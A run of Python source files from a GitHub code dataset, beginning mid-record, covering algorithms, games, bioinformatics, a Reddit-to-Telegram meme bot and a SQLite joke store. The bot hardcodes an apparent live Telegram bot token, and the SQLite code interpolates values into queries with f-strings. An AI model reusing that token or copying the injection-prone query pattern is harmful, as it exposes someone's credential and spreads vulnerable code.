into mask ...')\n    genMask(slide_path, xml_path, save_mask_path)\n    print('[INFO] convert '+uuid+' done')\n","repo_name":"Chloe1997/tumor-detection","sub_path":"TEST/Gen_mask.py","file_name":"Gen_mask.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5366545817","text":"# Most polynomial-time algorithms seen in practice are quadratic:\n# their running time grows with the square of the input size.\n\n\ndef is_subset(L1, L2):\n    for e1 in L1:\n        matched = False\n        for e2 in L2:\n            if e1 == e2:\n                matched = True\n                break\n        if not matched:\n            return False\n    return True\n\n\ndef intersect(L1, L2):\n    \"\"\"Return a list of the elements common to L1 and L2, without duplicates\"\"\"\n    tmp = []\n    for e1 in L1:\n        for e2 in L2:\n            if e1 == e2:\n                tmp.append(e1)\n    res = []\n    for e in tmp:\n        if not (e in res):\n            res.append(e)\n    return res\n\n\nb = intersect([1, 2, 3, 4, 5], [3, 4, 5, 6, 7])\nprint(b)\n","repo_name":"xeusteerapat/MIT-6.00.1x-EDX","sub_path":"Week_06/complexity_classes/quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40071341410","text":"from data.action import Action\nfrom data.asteroid import add_explosion\n\nclass HandleCollisionsAction(Action):\n    \"\"\"A code template for handling collisions. 
The responsibility of this class of objects is to update the game state when actors collide.\n \"\"\"\n\n def execute(self, game, cast):\n \"\"\"Executes the action using the given actors.\n\n Args:\n game\n\n cast (dict): The game actors {key: tag, value: list}.\n \"\"\"\n players = cast[\"players\"]\n\n for player in players:\n collision_list = player.collides_with_list(cast[\"asteroids\"])\n if collision_list:\n add_explosion(cast[\"particles\"], player.position)\n cast[\"players\"].remove(player)\n\n for asteroid in cast[\"asteroids\"]:\n for player in players:\n collision_list = asteroid.collides_with_list(player.laser_list)\n if collision_list:\n laser = collision_list[0]\n\n score = cast[\"asteroids\"][cast[\"asteroids\"].index(asteroid)].damage(laser.damage, cast)\n player.laser_list.remove(laser)\n\n if score != False:\n player.score += score\n break","repo_name":"ethancharles02/asteroids","sub_path":"data/handle_collisions_action.py","file_name":"handle_collisions_action.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25528389122","text":"def read_FASTA(file_path):\n sequences_dict = {}\n\n with open(file_path, \"r\") as f:\n lines = f.readlines()\n\n current_label = \"\"\n\n for index, item in enumerate(lines):\n if item[0] == \">\":\n current_label = item[1:].rstrip()\n sequences_dict[current_label] = \"\"\n else:\n sequences_dict[current_label] += item.rstrip()\n\n return sequences_dict\n\ndef DNA_complement(sequence):\n complement = \"\"\n for i in sequence:\n if i == \"A\":\n complement += \"T\"\n elif i == \"T\":\n complement += \"A\"\n elif i == \"C\":\n complement += \"G\"\n elif i == \"G\":\n complement += \"C\"\n return complement[::-1]\n\ndef main():\n data = read_FASTA(\"data/rosalind_revp.txt\")\n keys = list(data)\n dna_string = data[keys[0]]\n\n for start in range(0, len(dna_string)):\n for end in range(start, len(dna_string)):\n\n s = dna_string[start:end+1]\n l = len(s)\n\n if l >= 4 and l <= 12 and s == DNA_complement(s):\n print(str(start+1)+\" \"+str(end-start+1))\n\nif __name__ == '__main__':\n main()","repo_name":"zkokelj/rosalind","sub_path":"REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"727977249","text":"import time\nimport feedparser\nimport requests\nimport os\n\nchat_id = -1001789110861\nbot_token = \"5299386335:AAGXz22rE-zWa_k1YHy899KpYyJeCMkaVu8\"\nfeed_url = \"https://www.reddit.com/r/memes/new/.rss\"\n\nbin = 5\nl_bin = 7\n\nwhile bin <= l_bin:\n blog_feed = feedparser.parse(feed_url)\n blog_feed.feed.title\n blog_feed.feed.link\n len(blog_feed.entries)\n link = (blog_feed.entries[0].link)\n #print(link)\n \n response = requests.get(f'https://redditsave.com/info?url={link}')\n qq = response.text\n def slicetext(text, start, end):\n try:\n return text.split(start)[1].split(end)[0]\n except:\n return \"\"\n \n ww = slicetext(f\"{qq}\", \"https://i.redd.it/\", \"\\\" class\")\n #print(ww)\n with open('last.txt') as f:\n lines = f.readlines(0)\n #print(lines)\n ww2 = f'[\\'{ww}\\']'\n if str(lines)==ww2:\n #print(ww2)\n print('Nope')\n else:\n url = f'https://api.telegram.org/bot{bot_token}/sendPhoto?chat_id={chat_id}&photo=https://i.redd.it/{ww}&caption=Join+Us+@MemeWorldNo1'\n r = requests.get(url, allow_redirects=True)\n #print(r.text)\n with open('last.txt', 'w') as f:\n f.write(f'{ww}')\n 
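# pause between feed polls so reddit/redditsave and the Telegram API aren't hammered\n    # (note: 'bin' is never incremented above, so as written this loop keeps polling indefinitely)\n    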
time.sleep(5)\n","repo_name":"Ash-Boi/reddit-img-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4490512442","text":"if starting:\n # --------功能设置部分--------\n is_roll_yaw_connect = False # 偏航与滚转连动,启动时需设置鼠标操作限制部分中的连动程度\n is_aim_mode = True # 瞄准模式,按下右键时禁用滚转,鼠标x轴映射至偏航,精确调整机头指向用\n # ------------------------\n # 映射vjoy设备\n v = vJoy[0]\n # vjoy最大轴行程\n axis_max = 8 + v.axisMax\n axis_min = -8 - v.axisMax\n\n # --------轴定义部分,勿动--------\n # xyz轴定义\n pitch_axis = 0\n roll_axis = 0\n yaw_axis = 0\n # 油门轴定义\n throttle_axis = axis_min\n # 视角轴定义\n view_x_axis = 0\n view_y_axis = 0\n view_back_x = 0\n # 辅助轴定义\n key_pitch_axis = 0\n key_roll_axis = 0\n key_yaw_axis = 0\n mouse_pitch_axis = 0\n # 键盘操作判断\n key_pitch = False\n key_roll = False\n key_yaw = False\n # ------------------------\n\n # --------鼠标操作限制,默认可操作至满行程的75%(偏航除外,偏航默认与滚转连动),可自行修改--------\n mouse_pitch_limit = 0.75\n mouse_roll_limit = 0.75\n mouse_yaw_limit = 0.5\n # ------------------------\n\n # --------键盘操作限制,默认键盘操作时满杆,可自行修改--------\n key_pitch_limit = 1\n key_roll_limit = 1\n key_yaw_limit = 1\n # ------------------------\n\n # --------头部转动限制,默认偏转至左右90度,可自行修改--------\n max_head_yaw = 0.5\n max_head_pitch = 0.5\n\n # --------各轴灵敏度,可自行修改--------\n mouse_pitch_sens = 30\n mouse_roll_sens = 30\n mouse_yaw_sens = 30\n throttle_sens = 0.03\n aim_mode_sens = 15\n\n# --------按键设置部分--------\n\n# xyz三轴满杆按键,可自行修改\nkey_roll_left = keyboard.getKeyDown(Key.A) # 滚转\nkey_roll_right = keyboard.getKeyDown(Key.D)\nkey_pitch_up = keyboard.getKeyDown(Key.S) # 俯仰\nkey_pitch_down = keyboard.getKeyDown(Key.W)\nkey_yaw_left = keyboard.getKeyDown(Key.Q) # 偏航\nkey_yaw_right = keyboard.getKeyDown(Key.E)\n\n# 类苦力帽式视角调整,快捷键可自行修改\nkey_view_left = keyboard.getKeyDown(\n Key.Q) & keyboard.getKeyDown(Key.LeftAlt) # 向左看\nkey_view_right = keyboard.getKeyDown(\n Key.E) & keyboard.getKeyDown(Key.LeftAlt) # 向右看\nkey_view_back = keyboard.getKeyDown(\n Key.S) & keyboard.getKeyDown(Key.LeftAlt) # 向后看\nkey_view_up = keyboard.getKeyDown(\n Key.W) & keyboard.getKeyDown(Key.LeftAlt) # 向上看\n\nkey_free_view = keyboard.getKeyDown(Key.LeftAlt) # 自由视角\nkey_pitch_center = mouse.getButton(2) # 俯仰回中\nkey_aim_mode = mouse.getButton(1) # 瞄准模式,鼠标x轴变为偏航\nkey_throttle_up = keyboard.getKeyDown(Key.LeftShift) # 油门轴增加\nkey_throttle_down = keyboard.getKeyDown(Key.LeftControl) # 油门轴减少\n\n# --------代码实现--------\n# xyz三轴\nif (not key_free_view):\n # 俯仰\n if key_pitch_center:\n pitch_axis = 0\n elif key_pitch_up:\n key_pitch_axis = axis_max*key_pitch_limit\n key_pitch = True\n elif key_pitch_down:\n key_pitch_axis = axis_min*key_pitch_limit\n key_pitch = True\n else:\n key_pitch = False\n mouse_pitch_axis -= (mouse.deltaY*mouse_pitch_sens)\n\n # 滚转&偏航\n if key_roll_left:\n key_roll_axis = axis_min*key_roll_limit\n key_roll = True\n elif key_roll_right:\n key_roll_axis = axis_max*key_roll_limit\n key_roll = True\n elif key_yaw_left:\n key_yaw_axis = axis_min*key_yaw_limit\n key_yaw = True\n elif key_yaw_right:\n key_yaw_axis = axis_max*key_yaw_limit\n key_yaw = True\n else:\n key_roll = False\n key_yaw = False\n if(key_aim_mode and is_aim_mode):\n yaw_axis += (mouse.deltaX*mouse_yaw_sens)\n roll_axis = 0\n else:\n roll_axis = (mouse.deltaX*mouse_roll_sens*mouse_roll_limit*10)\n if is_roll_yaw_connect:\n yaw_axis = (mouse.deltaX*mouse_yaw_sens*mouse_yaw_limit*10)\nelse:\n roll_axis = 0\n yaw_axis = 0\n\n# 油门轴\nif key_throttle_up:\n throttle_axis += 
(axis_max*throttle_sens)\nif key_throttle_down:\n throttle_axis -= (axis_max*throttle_sens)\nif throttle_axis > axis_max:\n throttle_axis = axis_max\nelif throttle_axis < axis_min:\n throttle_axis = axis_min\n\n# 视角轴\nif key_view_left and key_view_right:\n view_x_axis = 0\nelif key_view_left and key_view_back:\n view_x_axis = axis_max\n view_back_x = 0\nelif key_view_right and key_view_back:\n view_x_axis = -axis_max\n view_back_x = 1\nelif key_view_back:\n if view_back_x == 0:\n view_x_axis = axis_max\n elif view_back_x == 1:\n view_x_axis = -axis_max\nelif key_view_left:\n view_x_axis = axis_max*max_head_yaw\nelif key_view_right:\n view_x_axis = -axis_max*max_head_yaw\nelif key_view_up:\n view_y_axis = axis_max*max_head_pitch\nelse:\n view_x_axis = 0\n view_y_axis = 0\n\n# 限制部分\n\nif key_roll:\n roll_axis = key_roll_axis\n if roll_axis > axis_max*key_roll_limit:\n roll_axis = axis_max*key_roll_limit\n elif roll_axis < axis_min*key_roll_limit:\n roll_axis = axis_min*key_roll_limit\nelse:\n if roll_axis > axis_max*mouse_roll_limit:\n roll_axis = axis_max*mouse_roll_limit\n elif roll_axis < axis_min*mouse_roll_limit:\n roll_axis = axis_min*mouse_roll_limit\n\nif key_yaw:\n yaw_axis = key_yaw_axis\n if yaw_axis > axis_max*key_yaw_limit:\n yaw_axis = axis_max*key_yaw_limit\n elif yaw_axis < axis_min*key_yaw_limit:\n yaw_axis = axis_min*key_yaw_limit\nelse:\n if yaw_axis > axis_max*mouse_yaw_limit:\n yaw_axis = axis_max*mouse_yaw_limit\n elif yaw_axis < axis_min*mouse_yaw_limit:\n yaw_axis = axis_min*mouse_yaw_limit\n\nif key_pitch:\n pitch_axis = key_pitch_axis\n if pitch_axis > axis_max*key_pitch_limit:\n pitch_axis = axis_max*key_pitch_limit\n elif pitch_axis < axis_min*key_pitch_limit:\n pitch_axis = axis_min*key_pitch_limit\nelse:\n pitch_axis = mouse_pitch_axis\n if pitch_axis > axis_max*mouse_pitch_limit:\n pitch_axis = axis_max*mouse_pitch_limit\n elif pitch_axis < axis_min*mouse_pitch_limit:\n pitch_axis = axis_min*mouse_pitch_limit\n\n# --------vjoy轴与按钮映射--------\nv.x = pitch_axis\nv.y = roll_axis\nv.z = yaw_axis\nv.rx = view_x_axis\nv.ry = view_y_axis\nv.slider = throttle_axis\n","repo_name":"lazarau/DCS_Script","sub_path":"fc3(legacy).py","file_name":"fc3(legacy).py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69938649444","text":"import os\r\nimport shutil\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Dataset path\r\nsrc_directory = '/cs/home/psxrm17/db/plantvillage'\r\nbase_target_directory = '/cs/home/psxrm17/db/PlantVillageDataset' \r\n\r\n# Target directories\r\ntrain_dir = os.path.join(base_target_directory, 'train')\r\nval_dir = os.path.join(base_target_directory, 'val')\r\ntest_dir = os.path.join(base_target_directory, 'test')\r\n\r\n#Splitting for each class\r\nfor class_name in os.listdir(src_directory):\r\n class_dir = os.path.join(src_directory, class_name)\r\n \r\n if os.path.isdir(class_dir):\r\n images = os.listdir(class_dir)\r\n train, temp = train_test_split(images, test_size=0.2, random_state=42)\r\n val, test = train_test_split(temp, test_size=0.5, random_state=42)\r\n\r\n def copy_files(files, target_dir):\r\n os.makedirs(target_dir, exist_ok=True)\r\n for file in files:\r\n shutil.copy(os.path.join(class_dir, file), os.path.join(target_dir, file))\r\n \r\n # Save the splitted dataset\r\n copy_files(train, os.path.join(train_dir, class_name))\r\n copy_files(val, os.path.join(val_dir, class_name))\r\n copy_files(test, 
os.path.join(test_dir, class_name))\r\n","repo_name":"RizaMithani/Plant-Disease-Classification-with-Ensemble-Learning","sub_path":"dataset_split.py","file_name":"dataset_split.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23460680358","text":"#Lesson 31\n#Intersection of 2 Linked Lists\nclass Node(object):\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\nclass Solution(object):\n def _length(self, n):\n len = 0\n curr = n\n while curr:\n curr = curr.next\n len+=1\n return len\n\n def intersection(self, a, b):\n lenA = self._length(a)\n lenB = self._length(b)\n currA = a\n currB = b\n if lenA > lenB:\n for _ in range(lenA - lenB):\n currA = currA.next\n else:\n for _ in range(lenB - lenA):\n currB = currB.next\n\n while currA != currB:\n currA = currA.next\n currB = currB.next\n\n return currA\n\n#test input\na = Node(1)\na.next = Node(2)\na.next.next = Node(3)\na.next.next.next = Node(4)\n\nb = Node(6)\nb.next = a.next.next\n\nprint(Solution().intersection(a, b).value)\n\n#Lesson 32\n#First missing pos integer\nclass Solution(object):\n def first_missing_position(self, nums):\n hash = {}\n for n in nums:\n hash[n] = 1\n\n for i in range(1, len(nums)):\n if i not in hash:\n return i\n return -1\n#test input\nprint(Solution().first_missing_position([3, 4, -1, 1]))\n\n#Lesson 33\n#Meeting Rooms\nimport heapq\n\ndef meeting_rooms(meetings):\n meetings.sort(key=lambda x: x[0])\n meeting_ends = []\n max_rooms = 0\n\n for meeting in meetings:\n while meeting_ends and meeting_ends[0] <= meeting[0]:\n heapq.heappop(meeting_ends)\n heapq.heappush(meeting_ends, meeting[1])\n max_rooms = max(max_rooms, len(meeting_ends))\n\n return max_rooms\n#test input\nprint(meeting_rooms([[0, 10], [10, 20]]))\n\nprint(meeting_rooms([[20, 30], [10, 21], [0, 50]]))\n\n#Lesson 34\n#Sort Colors\nfrom collections import defaultdict\n\nclass Solution(object):\n #hashmap implementation\n def sortColors(self, colors):\n colorsMap = defaultdict(int)\n for c in colors:\n colorsMap[c] += 1\n\n index = 0\n for i in range(colorsMap[0]):\n colors[index] = 0\n index += 1\n for i in range(colorsMap[1]):\n colors[index] = 1\n index += 1\n for i in range(colorsMap[2]):\n colors[index] = 2\n index += 1\n\n #indeces sort\n def sortColors2(self, colors):\n lowIndex = 0\n highIndex = len(colors) - 1\n currIndex = 0\n\n while currIndex <= highIndex:\n if colors[currIndex] == 0:\n colors[lowIndex], colors[currIndex] = colors[currIndex], colors[lowIndex]\n lowIndex += 1\n currIndex += 1\n elif colors[currIndex] == 2:\n colors[highIndex], colors[currIndex] = colors[currIndex], colors[highIndex]\n highIndex -= 1\n else:\n currIndex += 1\n\n#test input\ncolors = [0, 2, 1, 0, 1, 1, 2]\nSolution().sortColors(colors)\nprint(colors)\n\ncolors = [0, 2, 1, 0, 1, 1, 2]\nSolution().sortColors2(colors)\nprint(colors)\n\n#Lesson 35\n#Number of Islands\nclass Solution(object):\n def num_islands(self, grid):\n if not grid or not grid[0]:\n return 0\n numRows, numCols = len(grid), len(grid[0])\n count = 0\n\n for row in range(numRows):\n for col in range(numCols):\n if self._is_land(grid, row, col):\n count += 1\n self._sinkLand(grid, row, col)\n return count\n \n def _sinkLand(self, grid, row, col):\n if not self._is_land(grid, row, col):\n return \n grid[row][col] = 0\n for d in [(0, 1), (0, -1), (1, 0), (-1, 0)]:\n self._sinkLand(grid, row + d[0], col + d[1])\n\n def _is_land(self, grid, row, col):\n if row < 
0 or col < 0 or row >= len(grid) or col >= len(grid[0]):\n return False\n return grid[row][col] == 1\n \n#test input\ngrid = [[1, 1, 0, 0, 0], \n [0, 1, 0, 0, 1],\n [1, 0, 0, 1, 1], \n [0, 0, 0, 0, 0]]\n\nprint(Solution().num_islands(grid))","repo_name":"dominic-sangcap/python_algopro","sub_path":"AlgoPro/algopro_lesson_31-35.py","file_name":"algopro_lesson_31-35.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41497194919","text":"# Here you can create play commands that are specific to the module, and extend existing commands\n\nimport os, os.path\nimport sys\nimport shutil\nimport subprocess\n\nMODULE = 'wsimport'\n\n# Commands that are specific to your module\n\nCOMMANDS = ['wsimport:gen']\n\ndef execute(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n if command == \"wsimport:gen\":\n if os.path.exists(\"tmp/jaxws/\"):\n shutil.rmtree(\"tmp/jaxws\")\n\n os.makedirs(\"tmp/jaxws/\")\n\n for x in args:\n wsimport_args = [\"-d \", \"tmp/jaxws/ \", x]\n java_cmd = app.java_cmd(['-Xmx64m'], className='com.sun.tools.ws.WsImport', args=[wsimport_args])\n #print java_cmd\n #print os.environ\n subprocess.call(java_cmd, env=os.environ)\n\n jar_args = [\" -cvf\", \" lib/jaxws.jar\", \" -C\",\" tmp/jaxws/\", \" .\"]\n java_cmd = app.java_cmd(['-Xmx64m'], className='sun.tools.jar.Main', args=[jar_args])\n #print java_cmd\n subprocess.call(java_cmd, env=os.environ)\n\n# This will be executed before any command (new, run...)\ndef before(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n\n# This will be executed after any command (new, run...)\ndef after(**kargs):\n command = kargs.get(\"command\")\n app = kargs.get(\"app\")\n args = kargs.get(\"args\")\n env = kargs.get(\"env\")\n\n if command == \"new\":\n pass\n","repo_name":"mallowlabs/play-wsimport-module","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36899196659","text":"import sys\n\nfrom allennlp.common import FromParams\n\n\nclass WebQaQueryGenerator(FromParams):\n COMMANDS = \"Describe|State|Name\".split(\"|\")\n OBJECTS = [\"thing\", \"object\", \"entity\"]\n\n @staticmethod\n def _replace_noun(source_queries):\n out = []\n for q in source_queries:\n for obj in WebQaQueryGenerator.OBJECTS:\n if obj == \"thing\" and \"the $noun\" in q:\n # \"the thing\" doesn't really sound right\n continue\n out.append(q.replace(\"$noun\", obj))\n return out\n\n def __init__(self, version=0):\n self.version = version\n\n # Extra sample of the main query\n a2_queries = ['What $adj_type is this $noun?']\n for prefix in [\"this\", \"the\", \"that\"]:\n for qprefix in [\"What\", \"Which\"]:\n a2_queries += [f\"{qprefix} $adj_type is {prefix} $noun?\"]\n a2_queries += [f\"What is the $adj_type of {prefix} $noun?\"]\n for cmd in self.COMMANDS:\n a2_queries.append(f\"{cmd} the $adj_type of {prefix} $noun.\")\n\n a1_queries = self._replace_noun(a2_queries)\n\n v2_queries = []\n for prefix in [\"this\", \"the\", \"that\"]:\n # Oversample the main query\n v2_queries += [f\"What is {prefix} $noun doing?\"]*4\n\n v2_queries.append(f\"What action is {prefix} $noun taking?\")\n v2_queries.append(f\"What action is {prefix} $noun doing?\")\n 
v2_queries.append(f\"What activity is {prefix} $noun doing?\")\n\n for cmd in self.COMMANDS:\n v2_queries.append(f\"{cmd} the action being taken by {prefix} $noun.\")\n v2_queries.append(f\"{cmd} the activity {prefix} $noun is doing.\")\n v2_queries.append(f\"{cmd} what {prefix} $noun is doing.\")\n\n v1_queries = []\n for q in [\"What\", \"Which\"]:\n v1_queries += [\n f\"{q} action is being done?\",\n f\"{q} activity is being done?\",\n f\"{q} activity is this?\",\n f\"{q} action is being taken?\"\n ] * 2\n v1_queries += [\"What is being done?\"] * 3\n v1_queries += self._replace_noun(v2_queries)\n\n n1_queries = []\n for prefix in [\"this\", \"that\"]:\n n1_queries += [f\"What object is {prefix}?\"]*3\n n1_queries += [f\"What is {prefix}?\"]*2\n n1_queries += [f\"What entity is {prefix}?\"]*2\n\n for obj in self.OBJECTS:\n n1_queries += [f\"What is {prefix} {obj}?\"]\n for cmd in [\"Name\", \"Describe\", \"Classify\"]:\n n1_queries.append(f\"{cmd} {prefix} {obj}.\")\n\n self.train_types = {\n \"1n\": n1_queries,\n \"1v\": v1_queries,\n \"1a\": a1_queries,\n \"2a\": a2_queries,\n \"2v\": v2_queries,\n }\n\n self.test_types = {k: v[:1] for k, v in self.train_types.items()}\n\n def get_prompts(self, x, is_train=True):\n if is_train:\n templates = self.train_types[x.qtype]\n else:\n templates = self.test_types[x.qtype]\n\n if x.question_type in {\"1n\", \"1v\"}:\n return templates\n\n if x.question_type == \"2v\":\n assert x.query.startswith(\"What is this \")\n assert x.query.endswith(\" doing?\")\n noun = x.query[len(\"What is this \"):-len(\" doing?\")]\n return [sys.intern(x.replace(\"$noun\", noun)) for x in templates]\n elif x.question_type == \"2a\":\n assert x.query.startswith(\"What \")\n assert x.query.endswith(\"?\")\n q = x.query[len(\"What \"):-1]\n adj_type, noun = q.split(\" is this \")\n return [sys.intern(x.replace(\"$noun\", noun).replace(\"$adj_type\", adj_type)) for x in templates]\n elif x.question_type == \"1a\":\n assert x.query.startswith(\"What \")\n assert x.query.endswith(\" is this entity?\")\n adj_type = x.query[len(\"What \"):-len(\" is this entity?\")]\n return [sys.intern(x.replace(\"$adj_type\", adj_type)) for x in templates]\n else:\n raise NotImplementedError()\n","repo_name":"michalsr/gpv","sub_path":"exp/ours/data/webqa_templates_old.py","file_name":"webqa_templates_old.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12334606328","text":"class SomeModel:\n def predict(self, message: str):\n pass\n\n\ndef custom_prediction(message: str) -> float:\n cnt = 0\n len_mes = len(message)\n for i in message:\n if i.isdigit():\n cnt += 1\n return cnt / len_mes\n\n\ndef predict_message_mood(\n message: str,\n model: SomeModel,\n bad_thresholds: float = 0.3,\n good_thresholds: float = 0.8,\n) -> str:\n if len(message) == 0:\n return \"Empty message\"\n pred = model.predict(message)\n if pred < bad_thresholds:\n return \"неуд\"\n if pred > good_thresholds:\n return \"отл\"\n return \"норм\"\n","repo_name":"maikdonut/made_python_course","sub_path":"advance_07/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26632978440","text":"import json\n\n\nclass Jsontesting:\n\n def __init__(self, json1):\n with open(json1, 'r') as testing1:\n import json\n self.testing2 = json.load(testing1)\n\n def balancecalculations(self, json2):\n 
testing3 = self.testing2[json2]\n if testing3:\n return int(testing3[\"sample1\"]) - testing3[\"sample2\"]\n\nif __name__ == '__main__':\n x = Jsontesting('Test1.json')\n y = x.balancecalculations('TEST1')\n print(y)","repo_name":"keitharaneta/globalmantics_crm1","sub_path":"2-1-JASON EXAMPLE.py","file_name":"2-1-JASON EXAMPLE.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74812305444","text":"import requests\nfrom sentence_transformers import SentenceTransformer, util\n\n\ndef cosine_section_similarity(czech_lines : list[str], english_lines : list[str]) -> float:\n\n czech_joined = \", \".join(czech_lines) \n english_joined = \", \".join(english_lines)\n\n url = 'http://lindat.mff.cuni.cz/services/translation/api/v2/models/cs-en'\n response = requests.post(url, data = {\"input_text\": czech_joined})\n response.encoding='utf8'\n cz_to_english_joined = response.text\n\n model = SentenceTransformer('paraphrase-multilingual-MiniLM-L12-v2') # multi-language model\n\n embedding1 = model.encode(cz_to_english_joined, convert_to_tensor=False)\n embedding2 = model.encode(english_joined, convert_to_tensor=False)\n\n cosine_similarity = util.cos_sim(embedding1, embedding2)\n\n return(cosine_similarity[0][0].item())\n\n\ndef get_semantic_similarity(czech_sections : list[list[str]], english_sections : list[list[str]]) -> float:\n\n similarity_sum = 0\n\n if len(czech_sections) != len(english_sections):\n raise ValueError(\"The lyrics differ in number of sections.\")\n \n n_sections = len(czech_sections)\n\n n_lines = 0\n for section in czech_sections:\n n_lines += len(section)\n\n for i in range(n_sections):\n similarity_sum += ((len(czech_sections[i]) / n_lines) * cosine_section_similarity(czech_sections[i], english_sections[i]))\n \n return similarity_sum","repo_name":"stepankovab/NLP-Umea","sub_path":"FinalProject/CODE/semantic_similarity.py","file_name":"semantic_similarity.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31626352899","text":"import tensorflow as tf\nimport numpy as np\n\nclass F1History(tf.keras.callbacks.Callback):\n\n def __init__(self, test_dataset):\n super(F1History, self).__init__()\n self.test_dataset =test_dataset\n self.history = {\n 'val_precision':[],\n 'val_recall':[],\n 'val_f1':[],\n }\n\n def on_epoch_end(self, epoch, logs={}):\n\n logs['val_precision'] = 0 \n logs['val_recall'] = 0\n logs['val_f1'] = 0\n\n true_pos = 0\n pred_pos = 0\n pos = 0\n for i,j in self.test_dataset:\n y = self.model.predict(i)\n y = np.round(y[:,0])\n j = j.numpy()\n true_pos += sum(y*j)\n pred_pos += sum(y)\n pos += sum(j)\n\n logs['val_precision'] = true_pos/pred_pos\n logs['val_recall'] = true_pos/pos\n logs['val_f1'] = 2*logs['val_precision']*logs['val_recall']/(logs['val_recall']+logs['val_precision'])\n \n self.history['val_precision'] += [logs['val_precision']]\n self.history['val_recall'] += [logs['val_recall']]\n self.history['val_f1'] += [logs['val_f1']]\n \n print(logs)\n # X_valid, y_valid = self.validation[0], self.validation[1]\n # y_val_pred = (self.model.predict(X_valid).ravel()>0.5)+0\n # val_score = f1_score(y_valid, y_val_pred)\n # logs['F1_score_train'] = np.round(score, 5)\n # logs['F1_score_val'] = np.round(val_score, 
5)","repo_name":"nh0znoisung/Mask_Detection_IOT","sub_path":"serverAI/train/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9613326919","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\nimport sys\nsys.setrecursionlimit(300000)\n\ndef chk():\n cnt=0\n for i in range(8):\n if (w[i].count(\"Q\")>1): return 0\n if (w[i].count(\"Q\")==1): cnt+=1\n a=b=c=d=l=0\n for j in range(8):\n if w[j][i]==\"Q\": l+=1\n if i+j<8 and w[0+j][i+j]==\"Q\": a+=1\n if i-j>-1 and w[7-j][i-j]==\"Q\": b+=1\n if i-j>-1 and w[i-j][0+j]==\"Q\": c+=1\n if i+j<8 and w[i+j][7-j]==\"Q\": d+=1\n if l>1 or a>1 or b>1 or c>1 or d>1: return 0\n if cnt==8:\n for i in w:\n print(\"\".join(i))\n exit()\n return 1\n\ndef sol(a):\n for i in range(a,64,1):\n x=i//8\n y=i%8\n if w[x][y]==\"Q\": continue\n w[x][y]=\"Q\"\n if chk():\n sol(i+1)\n w[x][y]=\".\"\n\nw=[]\nfor i in range(8):\n w.append(list(input()))\nsol(0)\n \nprint(\"No Answer\")\n\n\n","repo_name":"clarinet758/atcoder","sub_path":"arc/r001_025/r001/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"785467749","text":"\nimport sqlite3\n\n\"\"\"Курсор (sql) и блок кода с заполнением базы данными, должны быть в одной функции \"\"\"\ndef jok_db (b):\n o = 1\n db = sqlite3.connect('jokes.db')#Создаём базу данных которая называется jokes и подключаемся к ней\n sql = db.cursor()#Создаём переменную sql хронящюю в себе cursor\n\n #Создаём таблицу anecdot если она не созданна (IF NOT EXISTS), со столбцами: number, joke\n sql.execute(\"\"\"CREATE TABLE IF NOT EXISTS anecdot (\n number INT,\n joke TEXT\n \n )\"\"\")\n db.commit()#Потверждаем наше действие\n\n #Щётчик для того чтобы номера в базе шли друг за другом\n while True:\n sql.execute(f\"SELECT number FROM anecdot WHERE number = '{o}'\")#Берём номер для проверки его уникальности\n\n if sql.fetchone() is None:#Если такого нрмена ещё нет то\n break#Останавливаем цикл и идём записывать\n\n else:#Иначе, тоесть если такой номер уже есть то\n o = o + 1#Меняем номер и проверяем ещё раз\n \n #Проверка уникальности анекдота\n sql.execute(f\"SELECT joke FROM anecdot WHERE joke = '{b}'\")#Беррём анекдот для проверки уникальности\n\n if sql.fetchone() is None:#Если такого анекдота ешё нет\n \n sql.execute(f\"INSERT INTO anecdot VALUES (?, ?)\", (o, b ))#Заливаем в таблицу информацию\n db.commit()#Потверждаем наше действие\n \n #Выводим таблицу\n for value1 in sql.execute(\"SELECT * FROM anecdot\"):\n print(value1)\n print('')\n print('')\n 